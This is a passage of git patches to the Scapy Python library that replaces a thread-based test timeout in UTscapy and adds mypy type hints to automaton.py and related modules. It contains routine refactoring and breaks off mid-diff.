autorun_commands_timeout(cmds, **kargs) except StopAutorun as e: e.code_run = sw.s raise diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index decb6326c96..8a79ff8f369 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -29,7 +29,7 @@ from scapy.consts import WINDOWS import scapy.modules.six as six -from scapy.modules.six.moves import range, queue +from scapy.modules.six.moves import range from scapy.config import conf from scapy.compat import base64_bytes, bytes_hex, plain_str from scapy.themes import DefaultTheme, BlackAndWhite @@ -521,18 +521,14 @@ def remove_empty_testsets(test_campaign): def _run_test_timeout(test, get_interactive_session, verb=3, my_globals=None): """Run a test with timeout""" - q = queue.Queue() - - def _runner(): - output, res = get_interactive_session(test, verb=verb, my_globals=my_globals) - q.put((output, res)) - th = threading.Thread(target=_runner) - th.daemon = True - th.start() - th.join(60 * 3) # 3 min timeout - if th.is_alive(): - return "Test timed out", False - return q.get() + from scapy.autorun import StopAutorunTimeout + try: + return get_interactive_session(test, + timeout=3 * 60, # 3 min + verb=verb, + my_globals=my_globals) + except StopAutorunTimeout: + return "-- Test timed out ! --", False def run_test(test, get_interactive_session, theme, verb=3, @@ -1242,7 +1238,6 @@ def main(): # Check active threads if VERB > 2: - import threading if threading.active_count() > 1: print("\nWARNING: UNFINISHED THREADS") print(threading.enumerate()) @@ -1252,6 +1247,8 @@ def main(): print("\nWARNING: UNFINISHED PROCESSES") print(processes) + sys.stdout.flush() + # Return state return glob_result From e28aa57033219de5690f11513b694e854bbab52a Mon Sep 17 00:00:00 2001 From: David Yang Date: Thu, 4 Nov 2021 22:41:32 +0800 Subject: [PATCH 0685/1632] [Hinty] Type hinting automaton.py (#3391) * Type hinting automaton.py Used ansmachine.py as initial reference, grepped into some other files along the way. Some notes taken while adding the hints: add_breakpoints returns None Unsure of object type that could have fileno() on 609 645 assumed from rd and wr from the above class * Various typing fixes Co-authored-by: gpotter2 --- .config/mypy/mypy_check.py | 22 ++ .config/mypy/mypy_enabled.txt | 1 + scapy/automaton.py | 434 +++++++++++++++++------ scapy/compat.py | 3 + scapy/contrib/isotp/isotp_soft_socket.py | 2 +- scapy/pipetool.py | 4 +- scapy/sendrecv.py | 10 +- scapy/supersocket.py | 5 +- scapy/utils.py | 2 +- test/testsocket.py | 32 +- 10 files changed, 365 insertions(+), 150 deletions(-) diff --git a/.config/mypy/mypy_check.py b/.config/mypy/mypy_check.py index 543bb1a2fe2..4d4bdf27644 100644 --- a/.config/mypy/mypy_check.py +++ b/.config/mypy/mypy_check.py @@ -62,6 +62,28 @@ "--show-traceback", ] + [os.path.abspath(f) for f in FILES] +if sys.platform.startswith("linux"): + ARGS.extend([ + "--always-true=LINUX", + "--always-false=OPENBSD", + "--always-false=FREEBSD", + "--always-false=NETBSD", + "--always-false=DARWIN", + "--always-false=WINDOWS", + "--always-false=BSD", + ]) +if sys.platform.startswith("win32"): + ARGS.extend([ + "--always-false=LINUX", + "--always-false=OPENBSD", + "--always-false=FREEBSD", + "--always-false=NETBSD", + "--always-false=DARWIN", + "--always-true=WINDOWS", + "--always-false=WINDOWS_XP", + "--always-false=BSD", + ]) + # Run mypy over the files mypy_main(None, sys.stdout, sys.stderr, ARGS) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 107dd82d797..291e0962f1a 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -18,6 +18,7 @@ scapy/asn1/ber.py scapy/asn1/mib.py scapy/asn1fields.py scapy/asn1packet.py +scapy/automaton.py scapy/base_classes.py scapy/compat.py scapy/config.py diff --git a/scapy/automaton.py b/scapy/automaton.py index 91465dae426..fb3bacd2b21 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -31,11 +31,32 @@ from scapy.plist import PacketList from scapy.data import MTU from scapy.supersocket import SuperSocket +from scapy.packet import Packet from scapy.consts import WINDOWS import scapy.modules.six as six +from scapy.compat import ( + Any, + Callable, + DecoratorCallable, + Deque, + Dict, + Generic, + Iterator, + List, + Optional, + Set, + Tuple, + Type, + TypeVar, + Union, + _Generic_metaclass, + cast, +) + def select_objects(inputs, remain): + # type: (List[Any], Union[float, int, None]) -> List[Any] """ Select objects. Same than: ``select.select(inputs, [], [], remain)`` @@ -105,59 +126,75 @@ def select_objects(inputs, remain): return list(results) -class ObjectPipe: +_T = TypeVar("_T") + + +@six.add_metaclass(_Generic_metaclass) +class ObjectPipe(Generic[_T]): def __init__(self, name=None): + # type: (Optional[str]) -> None self.name = name or "ObjectPipe" self._closed = False self.__rd, self.__wr = os.pipe() - self.__queue = deque() + self.__queue = deque() # type: Deque[_T] if WINDOWS: self._wincreate() - def _wincreate(self): - self._fd = ctypes.windll.kernel32.CreateEventA( - None, True, False, - ctypes.create_string_buffer(b"ObjectPipe %f" % random.random()) - ) - - def _winset(self): - if ctypes.windll.kernel32.SetEvent( - ctypes.c_void_p(self._fd)) == 0: - warning(ctypes.FormatError()) - - def _winreset(self): - if ctypes.windll.kernel32.ResetEvent( - ctypes.c_void_p(self._fd)) == 0: - warning(ctypes.FormatError()) + if WINDOWS: + def _wincreate(self): + # type: () -> None + self._fd = ctypes.windll.kernel32.CreateEventA( + None, True, False, + ctypes.create_string_buffer(b"ObjectPipe %f" % random.random()) + ) - def _winclose(self): - if self._fd and ctypes.windll.kernel32.CloseHandle( - ctypes.c_void_p(self._fd)) == 0: - warning(ctypes.FormatError()) - self._fd = None + def _winset(self): + # type: () -> None + if ctypes.windll.kernel32.SetEvent( + ctypes.c_void_p(self._fd)) == 0: + warning(ctypes.FormatError()) + + def _winreset(self): + # type: () -> None + if ctypes.windll.kernel32.ResetEvent( + ctypes.c_void_p(self._fd)) == 0: + warning(ctypes.FormatError()) + + def _winclose(self): + # type: () -> None + if self._fd and ctypes.windll.kernel32.CloseHandle( + ctypes.c_void_p(self._fd)) == 0: + warning(ctypes.FormatError()) + self._fd = None def fileno(self): + # type: () -> int if WINDOWS: return self._fd - else: - return self.__rd + return self.__rd def send(self, obj): + # type: (Union[_T]) -> int self.__queue.append(obj) if WINDOWS: self._winset() os.write(self.__wr, b"X") + return 1 def write(self, obj): + # type: (_T) -> None self.send(obj) def empty(self): + # type: () -> bool return not bool(self.__queue) def flush(self): + # type: () -> None pass def recv(self, n=0): + # type: (Optional[int]) -> Optional[_T] if self._closed: return None os.read(self.__rd, 1) @@ -167,9 +204,11 @@ def recv(self, n=0): return elt def read(self, n=0): + # type: (Optional[int]) -> Optional[_T] return self.recv(n) def close(self): + # type: () -> None if not self._closed: self._closed = True os.close(self.__rd) @@ -179,13 +218,16 @@ def close(self): self._winclose() def __repr__(self): + # type: () -> str return "<%s at %s>" % (self.name, id(self)) def __del__(self): + # type: () -> None self.close() @staticmethod def select(sockets, remain=conf.recv_poll_rate): + # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] # Only handle ObjectPipes results = [] for s in sockets: @@ -197,10 +239,18 @@ def select(sockets, remain=conf.recv_poll_rate): class Message: + type = None # type: str + pkt = None # type: Packet + result = None # type: str + state = None # type: Message + exc_info = None # type: Union[Tuple[None, None, None], Tuple[BaseException, Exception, types.TracebackType]] # noqa: E501 + def __init__(self, **args): + # type: (Any) -> None self.__dict__.update(args) def __repr__(self): + # type: () -> str return "" % " ".join("%s=%r" % (k, v) for (k, v) in six.iteritems(self.__dict__) # noqa: E501 if not k.startswith("_")) @@ -208,26 +258,33 @@ def __repr__(self): class _instance_state: def __init__(self, instance): + # type: (Any) -> None self.__self__ = instance.__self__ self.__func__ = instance.__func__ self.__self__.__class__ = instance.__self__.__class__ def __getattr__(self, attr): + # type: (str) -> Any return getattr(self.__func__, attr) def __call__(self, *args, **kargs): + # type: (Any, Any) -> Any return self.__func__(self.__self__, *args, **kargs) def breaks(self): + # type: () -> Any return self.__self__.add_breakpoints(self.__func__) def intercepts(self): + # type: () -> Any return self.__self__.add_interception_points(self.__func__) def unbreaks(self): + # type: () -> Any return self.__self__.remove_breakpoints(self.__func__) def unintercepts(self): + # type: () -> Any return self.__self__.remove_interception_points(self.__func__) @@ -235,6 +292,25 @@ def unintercepts(self): # Automata # ############## +class _StateWrapper: + __name__ = None # type: str + atmt_type = None # type: str + atmt_state = None # type: str + atmt_initial = None # type: int + atmt_final = None # type: int + atmt_stop = None # type: int + atmt_error = None # type: int + atmt_origfunc = None # type: _StateWrapper + atmt_prio = None # type: int + atmt_as_supersocket = None # type: Optional[str] + atmt_condname = None # type: str + atmt_ioname = None # type: str + atmt_timeout = None # type: int + atmt_cond = None # type: Dict[str, int] + __code__ = None # type: types.CodeType + __call__ = None # type: Callable[..., ATMT.NewStateRequested] + + class ATMT: STATE = "State" ACTION = "Action" @@ -245,6 +321,7 @@ class ATMT: class NewStateRequested(Exception): def __init__(self, state_func, automaton, *args, **kargs): + # type: (Any, ATMT, Any, Any) -> None self.func = state_func self.state = state_func.atmt_state self.initial = state_func.atmt_initial @@ -258,19 +335,28 @@ def __init__(self, state_func, automaton, *args, **kargs): self.action_parameters() # init action parameters def action_parameters(self, *args, **kargs): + # type: (Any, Any) -> ATMT.NewStateRequested self.action_args = args self.action_kargs = kargs return self def run(self): + # type: () -> Any return self.func(self.automaton, *self.args, **self.kargs) def __repr__(self): + # type: () -> str return "NewStateRequested(%s)" % self.state @staticmethod - def state(initial=0, final=0, stop=0, error=0): + def state(initial=0, # type: int + final=0, # type: int + stop=0, # type: int + error=0 # type: int + ): + # type: (...) -> Callable[[DecoratorCallable], DecoratorCallable] def deco(f, initial=initial, final=final): + # type: (_StateWrapper, int, int) -> _StateWrapper f.atmt_type = ATMT.STATE f.atmt_state = f.__name__ f.atmt_initial = initial @@ -278,9 +364,11 @@ def deco(f, initial=initial, final=final): f.atmt_stop = stop f.atmt_error = error - def state_wrapper(self, *args, **kargs): + def _state_wrapper(self, *args, **kargs): + # type: (ATMT, Any, Any) -> ATMT.NewStateRequested return ATMT.NewStateRequested(f, self, *args, **kargs) + state_wrapper = cast(_StateWrapper, _state_wrapper) state_wrapper.__name__ = "%s_wrapper" % f.__name__ state_wrapper.atmt_type = ATMT.STATE state_wrapper.atmt_state = f.__name__ @@ -290,11 +378,13 @@ def state_wrapper(self, *args, **kargs): state_wrapper.atmt_error = error state_wrapper.atmt_origfunc = f return state_wrapper - return deco + return deco # type: ignore @staticmethod def action(cond, prio=0): + # type: (Any, int) -> Callable[[_StateWrapper, _StateWrapper], _StateWrapper] # noqa: E501 def deco(f, cond=cond): + # type: (_StateWrapper, _StateWrapper) -> _StateWrapper if not hasattr(f, "atmt_type"): f.atmt_cond = {} f.atmt_type = ATMT.ACTION @@ -304,7 +394,9 @@ def deco(f, cond=cond): @staticmethod def condition(state, prio=0): + # type: (Any, int) -> Callable[[_StateWrapper, _StateWrapper], _StateWrapper] # noqa: E501 def deco(f, state=state): + # type: (_StateWrapper, _StateWrapper) -> Any f.atmt_type = ATMT.CONDITION f.atmt_state = state.atmt_state f.atmt_condname = f.__name__ @@ -314,7 +406,9 @@ def deco(f, state=state): @staticmethod def receive_condition(state, prio=0): + # type: (_StateWrapper, int) -> Callable[[_StateWrapper, _StateWrapper], _StateWrapper] # noqa: E501 def deco(f, state=state): + # type: (_StateWrapper, _StateWrapper) -> _StateWrapper f.atmt_type = ATMT.RECV f.atmt_state = state.atmt_state f.atmt_condname = f.__name__ @@ -323,8 +417,14 @@ def deco(f, state=state): return deco @staticmethod - def ioevent(state, name, prio=0, as_supersocket=None): + def ioevent(state, # type: _StateWrapper + name, # type: str + prio=0, # type: int + as_supersocket=None # type: Optional[str] + ): + # type: (...) -> Callable[[_StateWrapper, _StateWrapper], _StateWrapper] # noqa: E501 def deco(f, state=state): + # type: (_StateWrapper, _StateWrapper) -> _StateWrapper f.atmt_type = ATMT.IOEVENT f.atmt_state = state.atmt_state f.atmt_condname = f.__name__ @@ -336,7 +436,9 @@ def deco(f, state=state): @staticmethod def timeout(state, timeout): + # type: (_StateWrapper, int) -> Callable[[_StateWrapper, _StateWrapper, int], _StateWrapper] # noqa: E501 def deco(f, state=state, timeout=timeout): + # type: (_StateWrapper, _StateWrapper, int) -> _StateWrapper f.atmt_type = ATMT.TIMEOUT f.atmt_state = state.atmt_state f.atmt_timeout = timeout @@ -362,32 +464,45 @@ class _ATMT_Command: class _ATMT_supersocket(SuperSocket): - def __init__(self, name, ioevent, automaton, proto, *args, **kargs): + def __init__(self, + name, # type: str + ioevent, # type: str + automaton, # type: Type[Automaton] + proto, # type: Callable[[bytes], Any] + *args, # type: Any + **kargs # type: Any + ): + # type: (...) -> None self.name = name self.ioevent = ioevent self.proto = proto # write, read - self.spa, self.spb = ObjectPipe("spa"), ObjectPipe("spb") + self.spa, self.spb = ObjectPipe[bytes]("spa"), \ + ObjectPipe[bytes]("spb") kargs["external_fd"] = {ioevent: (self.spa, self.spb)} kargs["is_atmt_socket"] = True self.atmt = automaton(*args, **kargs) self.atmt.runbg() def send(self, s): + # type: (bytes) -> int if not isinstance(s, bytes): s = bytes(s) - self.spa.send(s) + return self.spa.send(s) def fileno(self): + # type: () -> int return self.spb.fileno() def recv(self, n=MTU): + # type: (Optional[int]) -> Any r = self.spb.recv(n) - if self.proto is not None: + if self.proto is not None and r is not None: r = self.proto(r) return r def close(self): + # type: () -> None if not self.closed: self.atmt.stop() self.spa.close() @@ -396,16 +511,19 @@ def close(self): @staticmethod def select(sockets, remain=conf.recv_poll_rate): + # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] return select_objects(sockets, remain) class _ATMT_to_supersocket: def __init__(self, name, ioevent, automaton): + # type: (str, str, Type[Automaton]) -> None self.name = name self.ioevent = ioevent self.automaton = automaton def __call__(self, proto, *args, **kargs): + # type: (Callable[[bytes], Any], Any, Any) -> _ATMT_supersocket return _ATMT_supersocket( self.name, self.ioevent, self.automaton, proto, *args, **kargs @@ -413,17 +531,17 @@ def __call__(self, proto, *args, **kargs): class Automaton_metaclass(type): - def __new__(cls, name, bases, dct): + def __new__(cls, name, bases, dct): # type: ignore + # type: (str, Tuple[Any], Dict[str, Any]) -> Type[Automaton] cls = super(Automaton_metaclass, cls).__new__(cls, name, bases, dct) cls.states = {} - cls.state = None - cls.recv_conditions = {} - cls.conditions = {} - cls.ioevents = {} - cls.timeout = {} - cls.actions = {} - cls.initial_states = [] - cls.stop_states = [] + cls.recv_conditions = {} # type: Dict[str, List[_StateWrapper]] + cls.conditions = {} # type: Dict[str, List[_StateWrapper]] + cls.ioevents = {} # type: Dict[str, List[_StateWrapper]] + cls.timeout = {} # type: Dict[str, List[Tuple[int, _StateWrapper]]] # noqa: E501 + cls.actions = {} # type: Dict[str, List[_StateWrapper]] + cls.initial_states = [] # type: List[_StateWrapper] + cls.stop_states = [] # type: List[_StateWrapper] cls.ionames = [] cls.iosupersockets = [] @@ -437,7 +555,7 @@ def __new__(cls, name, bases, dct): members[k] = v decorated = [v for v in six.itervalues(members) - if isinstance(v, types.FunctionType) and hasattr(v, "atmt_type")] # noqa: E501 + if hasattr(v, "atmt_type")] for m in decorated: if m.atmt_type == ATMT.STATE: @@ -467,8 +585,8 @@ def __new__(cls, name, bases, dct): elif m.atmt_type == ATMT.TIMEOUT: cls.timeout[m.atmt_state].append((m.atmt_timeout, m)) elif m.atmt_type == ATMT.ACTION: - for c in m.atmt_cond: - cls.actions[c].append(m) + for co in m.atmt_cond: + cls.actions[co].append(m) for v in six.itervalues(cls.timeout): v.sort(key=lambda x: x[0]) @@ -481,11 +599,15 @@ def __new__(cls, name, bases, dct): actlst.sort(key=lambda x: x.atmt_cond[condname]) for ioev in cls.iosupersockets: - setattr(cls, ioev.atmt_as_supersocket, _ATMT_to_supersocket(ioev.atmt_as_supersocket, ioev.atmt_ioname, cls)) # noqa: E501 - - return cls + setattr(cls, ioev.atmt_as_supersocket, + _ATMT_to_supersocket( + ioev.atmt_as_supersocket, + ioev.atmt_ioname, + cast(Type["Automaton"], cls))) + return cast(Type["Automaton"], cls) def build_graph(self): + # type: () -> str s = 'digraph "%s" {\n' % self.__class__.__name__ se = "" # Keep initial nodes at the beginning for better rendering @@ -515,8 +637,8 @@ def build_graph(self): for x in self.actions[f.atmt_condname]: line += "\\l>[%s]" % x.__name__ s += '\t"%s" -> "%s" [label="%s", color=%s];\n' % (k, n, line, c) # noqa: E501 - for k, v in six.iteritems(self.timeout): - for t, f in v: + for k, v2 in six.iteritems(self.timeout): + for t, f in v2: if f is None: continue for n in f.__code__.co_names + f.__code__.co_consts: @@ -529,12 +651,77 @@ def build_graph(self): return s def graph(self, **kargs): + # type: (Any) -> Optional[str] s = self.build_graph() return do_graph(s, **kargs) -class Automaton(six.with_metaclass(Automaton_metaclass)): +@six.add_metaclass(Automaton_metaclass) +class Automaton: + states = {} # type: Dict[str, _StateWrapper] + state = None # type: ATMT.NewStateRequested + recv_conditions = {} # type: Dict[str, List[_StateWrapper]] + conditions = {} # type: Dict[str, List[_StateWrapper]] + ioevents = {} # type: Dict[str, List[_StateWrapper]] + timeout = {} # type: Dict[str, List[Tuple[int, _StateWrapper]]] # noqa: E501 + actions = {} # type: Dict[str, List[_StateWrapper]] + initial_states = [] # type: List[_StateWrapper] + stop_states = [] # type: List[_StateWrapper] + ionames = [] # type: List[str] + iosupersockets = [] # type: List[SuperSocket] + + # Internals + def __init__(self, *args, **kargs): + # type: (Any, Any) -> None + external_fd = kargs.pop("external_fd", {}) + self.send_sock_class = kargs.pop("ll", conf.L3socket) + self.recv_sock_class = kargs.pop("recvsock", conf.L2listen) + self.is_atmt_socket = kargs.pop("is_atmt_socket", False) + self.started = threading.Lock() + self.threadid = None # type: Optional[int] + self.breakpointed = None + self.breakpoints = set() # type: Set[_StateWrapper] + self.interception_points = set() # type: Set[_StateWrapper] + self.intercepted_packet = None # type: Union[None, Packet] + self.debug_level = 0 + self.init_args = args + self.init_kargs = kargs + self.io = type.__new__(type, "IOnamespace", (), {}) + self.oi = type.__new__(type, "IOnamespace", (), {}) + self.cmdin = ObjectPipe[Message]("cmdin") + self.cmdout = ObjectPipe[Message]("cmdout") + self.ioin = {} + self.ioout = {} + self.packets = PacketList() # type: PacketList + for n in self.__class__.ionames: + extfd = external_fd.get(n) + if not isinstance(extfd, tuple): + extfd = (extfd, extfd) + ioin, ioout = extfd + if ioin is None: + ioin = ObjectPipe("ioin") + else: + ioin = self._IO_fdwrapper(ioin, None) + if ioout is None: + ioout = ObjectPipe("ioout") + else: + ioout = self._IO_fdwrapper(None, ioout) + + self.ioin[n] = ioin + self.ioout[n] = ioout + ioin.ioname = n + ioout.ioname = n + setattr(self.io, n, self._IO_mixer(ioout, ioin)) + setattr(self.oi, n, self._IO_mixer(ioin, ioout)) + + for stname in self.states: + setattr(self, stname, + _instance_state(getattr(self, stname))) + + self.start() + def parse_args(self, debug=0, store=1, **kargs): + # type: (int, int, Any) -> None self.debug_level = debug if debug: conf.logLevel = logging.DEBUG @@ -542,66 +729,93 @@ def parse_args(self, debug=0, store=1, **kargs): self.store_packets = store def master_filter(self, pkt): + # type: (Packet) -> bool return True def my_send(self, pkt): + # type: (Packet) -> None self.send_sock.send(pkt) # Utility classes and exceptions class _IO_fdwrapper: - def __init__(self, rd, wr): + def __init__(self, + rd, # type: Union[int, ObjectPipe[bytes], None] + wr # type: Union[int, ObjectPipe[bytes], None] + ): + # type: (...) -> None if rd is not None and not isinstance(rd, (int, ObjectPipe)): - rd = rd.fileno() + rd = rd.fileno() # type: ignore if wr is not None and not isinstance(wr, (int, ObjectPipe)): - wr = wr.fileno() + wr = wr.fileno() # type: ignore self.rd = rd self.wr = wr def fileno(self): + # type: () -> int if isinstance(self.rd, ObjectPipe): return self.rd.fileno() - return self.rd + elif isinstance(self.rd, int): + return self.rd + return 0 def read(self, n=65535): + # type: (int) -> Optional[bytes] if isinstance(self.rd, ObjectPipe): return self.rd.recv(n) - return os.read(self.rd, n) + elif isinstance(self.rd, int): + return os.read(self.rd, n) + return None def write(self, msg): + # type: (bytes) -> int if isinstance(self.wr, ObjectPipe): return self.wr.send(msg) - return os.write(self.wr, msg) + elif isinstance(self.wr, int): + return os.write(self.wr, msg) + return 0 def recv(self, n=65535): + # type: (int) -> Optional[bytes] return self.read(n) def send(self, msg): + # type: (bytes) -> int return self.write(msg) class _IO_mixer: - def __init__(self, rd, wr): + def __init__(self, + rd, # type: ObjectPipe[Any] + wr, # type: ObjectPipe[Any] + ): + # type: (...) -> None self.rd = rd self.wr = wr def fileno(self): + # type: () -> Any if isinstance(self.rd, ObjectPipe): return self.rd.fileno() return self.rd def recv(self, n=None): + # type: (Optional[int]) -> Any return self.rd.recv(n) def read(self, n=None): + # type: (Optional[int]) -> Any return self.recv(n) def send(self, msg): + # type: (str) -> int return self.wr.send(msg) def write(self, msg): + # type: (str) -> int return self.send(msg) class AutomatonException(Exception): def __init__(self, msg, state=None, result=None): + # type: (str, Optional[Message], Optional[str]) -> None Exception.__init__(self, msg) self.state = state self.result = result @@ -626,6 +840,7 @@ class Singlestep(AutomatonStopped): class InterceptionPoint(AutomatonStopped): def __init__(self, msg, state=None, result=None, packet=None): + # type: (str, Optional[Message], Optional[str], Optional[str]) -> None # noqa: E501 Automaton.AutomatonStopped.__init__(self, msg, state=state, result=result) # noqa: E501 self.packet = packet @@ -634,16 +849,23 @@ class CommandMessage(AutomatonException): # Services def debug(self, lvl, msg): + # type: (int, str) -> None if self.debug_level >= lvl: log_runtime.debug(msg) def send(self, pkt): + # type: (Packet) -> None if self.state.state in self.interception_points: self.debug(3, "INTERCEPT: packet intercepted: %s" % pkt.summary()) self.intercepted_packet = pkt - cmd = Message(type=_ATMT_Command.INTERCEPT, state=self.state, pkt=pkt) # noqa: E501 - self.cmdout.send(cmd) + self.cmdout.send( + Message(type=_ATMT_Command.INTERCEPT, + state=self.state, pkt=pkt) + ) cmd = self.cmdin.recv() + if not cmd: + self.debug(3, "CANCELLED") + return self.intercepted_packet = None if cmd.type == _ATMT_Command.REJECT: self.debug(3, "INTERCEPT: packet rejected") @@ -661,61 +883,16 @@ def send(self, pkt): if self.store_packets: self.packets.append(pkt.copy()) - # Internals - def __init__(self, *args, **kargs): - external_fd = kargs.pop("external_fd", {}) - self.send_sock_class = kargs.pop("ll", conf.L3socket) - self.recv_sock_class = kargs.pop("recvsock", conf.L2listen) - self.is_atmt_socket = kargs.pop("is_atmt_socket", False) - self.started = threading.Lock() - self.threadid = None - self.breakpointed = None - self.breakpoints = set() - self.interception_points = set() - self.intercepted_packet = None - self.debug_level = 0 - self.init_args = args - self.init_kargs = kargs - self.io = type.__new__(type, "IOnamespace", (), {}) - self.oi = type.__new__(type, "IOnamespace", (), {}) - self.cmdin = ObjectPipe("cmdin") - self.cmdout = ObjectPipe("cmdout") - self.ioin = {} - self.ioout = {} - for n in self.ionames: - extfd = external_fd.get(n) - if not isinstance(extfd, tuple): - extfd = (extfd, extfd) - ioin, ioout = extfd - if ioin is None: - ioin = ObjectPipe("ioin") - else: - ioin = self._IO_fdwrapper(ioin, None) - if ioout is None: - ioout = ObjectPipe("ioout") - else: - ioout = self._IO_fdwrapper(None, ioout) - - self.ioin[n] = ioin - self.ioout[n] = ioout - ioin.ioname = n - ioout.ioname = n - setattr(self.io, n, self._IO_mixer(ioout, ioin)) - setattr(self.oi, n, self._IO_mixer(ioin, ioout)) - - for stname in self.states: - setattr(self, stname, - _instance_state(getattr(self, stname))) - - self.start() - def __iter__(self): + # type: () -> Automaton return self def __del__(self): + # type: () -> None self.stop() def _run_condition(self, cond, *args, **kargs): + # type: (_StateWrapper, Any, Any) -> None try: self.debug(5, "Trying %s [%s]" % (cond.atmt_type, cond.atmt_condname)) # noqa: E501 cond(self, *args, **kargs) @@ -735,6 +912,7 @@ def _run_condition(self, cond, *args, **kargs): self.debug(2, "%s [%s] not taken" % (cond.atmt_type, cond.atmt_condname)) # noqa: E501 def _do_start(self, *args, **kargs): + # type: (Any, Any) -> None ready = threading.Event() _t = threading.Thread( target=self._do_control, @@ -747,8 +925,11 @@ def _do_start(self, *args, **kargs): ready.wait() def _do_control(self, ready, *args, **kargs): + # type: (threading.Event, Any, Any) -> None with self.started: self.threadid = threading.current_thread().ident + if self.threadid is None: + self.threadid = 0 # Update default parameters a = args + self.init_args[len(args):] @@ -770,6 +951,8 @@ def _do_control(self, ready, *args, **kargs): try: while True: c = self.cmdin.recv() + if c is None: + return None self.debug(5, "Received command %s" % c.type) if c.type == _ATMT_Command.RUN: singlestep = False @@ -812,6 +995,7 @@ def _do_control(self, ready, *args, **kargs): self.threadid = None def _do_iter(self): + # type: () -> Iterator[Union[Automaton.AutomatonException, Automaton.AutomatonStopped, ATMT.NewStateRequested, None]] # noqa: E501 while True: try: self.debug(1, "## state=[%s]" % self.state.state) @@ -867,7 +1051,7 @@ def _do_iter(self): self._run_condition(timeout_func, *state_output) next_timeout, timeout_func = next(expirations) if next_timeout is None: - remain = None + remain = 0 else: remain = next_timeout - t @@ -899,6 +1083,7 @@ def _do_iter(self): yield state_req def __repr__(self): + # type: () -> str return "" % ( self.__class__.__name__, ["HALTED", "RUNNING"][self.started.locked()] @@ -906,43 +1091,54 @@ def __repr__(self): # Public API def add_interception_points(self, *ipts): + # type: (Any) -> None for ipt in ipts: if hasattr(ipt, "atmt_state"): ipt = ipt.atmt_state self.interception_points.add(ipt) def remove_interception_points(self, *ipts): + # type: (Any) -> None for ipt in ipts: if hasattr(ipt, "atmt_state"): ipt = ipt.atmt_state self.interception_points.discard(ipt) def add_breakpoints(self, *bps): + # type: (Any) -> None for bp in bps: if hasattr(bp, "atmt_state"): bp = bp.atmt_state self.breakpoints.add(bp) def remove_breakpoints(self, *bps): + # type: (Any) -> None for bp in bps: if hasattr(bp, "atmt_state"): bp = bp.atmt_state self.breakpoints.discard(bp) def start(self, *args, **kargs): + # type: (Any, Any) -> None if not self.started.locked(): self._do_start(*args, **kargs) - def run(self, resume=None, wait=True): + def run(self, + resume=None, # type: Optional[Message] + wait=True # type: Optional[bool] + ): + # type: (...) -> Any if resume is None: resume = Message(type=_ATMT_Command.RUN) self.cmdin.send(resume) if wait: try: c = self.cmdout.recv() + if c is None: + return None except KeyboardInterrupt: self.cmdin.send(Message(type=_ATMT_Command.FREEZE)) - return + return None if c.type == _ATMT_Command.END: return c.result elif c.type == _ATMT_Command.INTERCEPT: @@ -953,15 +1149,19 @@ def run(self, resume=None, wait=True): raise self.Breakpoint("breakpoint triggered on state [%s]" % c.state.state, state=c.state.state) # noqa: E501 elif c.type == _ATMT_Command.EXCEPTION: six.reraise(c.exc_info[0], c.exc_info[1], c.exc_info[2]) + return None def runbg(self, resume=None, wait=False): + # type: (Optional[Message], Optional[bool]) -> None self.run(resume, wait) def next(self): + # type: () -> Any return self.run(resume=Message(type=_ATMT_Command.NEXT)) __next__ = next def _flush_inout(self): + # type: () -> None with self.started: # Flush command pipes while True: @@ -972,18 +1172,25 @@ def _flush_inout(self): fd.recv() def stop(self): + # type: () -> None self.cmdin.send(Message(type=_ATMT_Command.STOP)) self._flush_inout() def forcestop(self): + # type: () -> None self.cmdin.send(Message(type=_ATMT_Command.FORCESTOP)) self._flush_inout() def restart(self, *args, **kargs): + # type: (Any, Any) -> None self.stop() self.start(*args, **kargs) - def accept_packet(self, pkt=None, wait=False): + def accept_packet(self, + pkt=None, # type: Optional[Packet] + wait=False # type: Optional[bool] + ): + # type: (...) -> Any rsm = Message() if pkt is None: rsm.type = _ATMT_Command.ACCEPT @@ -992,6 +1199,9 @@ def accept_packet(self, pkt=None, wait=False): rsm.pkt = pkt return self.run(resume=rsm, wait=wait) - def reject_packet(self, wait=False): + def reject_packet(self, + wait=False # type: Optional[bool] + ): + # type: (...) -> Any rsm = Message(type=_ATMT_Command.REJECT) return self.run(resume=rsm, wait=wait) diff --git a/scapy/compat.py b/scapy/compat.py index 5b16aaa6849..12a4fd68379 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -25,6 +25,7 @@ 'AnyStr', 'Callable', 'DefaultDict', + 'Deque', 'Dict', 'Generic', 'IO', @@ -122,6 +123,7 @@ def __repr__(self): AnyStr, Callable, DefaultDict, + Deque, Dict, Generic, IO, @@ -152,6 +154,7 @@ def cast(_type, obj): # type: ignore Callable = _FakeType("Callable") DefaultDict = _FakeType("DefaultDict", # type: ignore collections.defaultdict) + Deque = _FakeType("Deque") # type: ignore Dict = _FakeType("Dict", dict) # type: ignore Generic = _FakeType("Generic") IO = _FakeType("IO") # type: ignore diff --git a/scapy/contrib/isotp/isotp_soft_socket.py b/scapy/contrib/isotp/isotp_soft_socket.py index 7d55738d969..ddcd56e8ba6 100644 --- a/scapy/contrib/isotp/isotp_soft_socket.py +++ b/scapy/contrib/isotp/isotp_soft_socket.py @@ -523,7 +523,7 @@ def __init__(self, self.rxfc_bs = rx_block_size self.rxfc_stmin = stmin - self.rx_queue = ObjectPipe() + self.rx_queue = ObjectPipe[Tuple[bytes, Union[float, EDecimal]]]() self.rx_len = -1 self.rx_buf = None # type: Optional[bytes] self.rx_sn = 0 diff --git a/scapy/pipetool.py b/scapy/pipetool.py index 4097c0c4eca..da02ede8a12 100644 --- a/scapy/pipetool.py +++ b/scapy/pipetool.py @@ -20,6 +20,8 @@ from scapy.config import conf from scapy.utils import get_temp_file, do_graph +from scapy.compat import _Generic_metaclass + class PipeEngine(ObjectPipe): pipes = {} @@ -250,7 +252,7 @@ def __hash__(self): return object.__hash__(self) -class _PipeMeta(type): +class _PipeMeta(_Generic_metaclass): def __new__(cls, name, bases, dct): c = type.__new__(cls, name, bases, dct) PipeEngine.pipes[name] = c diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index c3e53b21770..0a14eeaf9e8 100644 --- a/scapy/sendrecv.py +++ 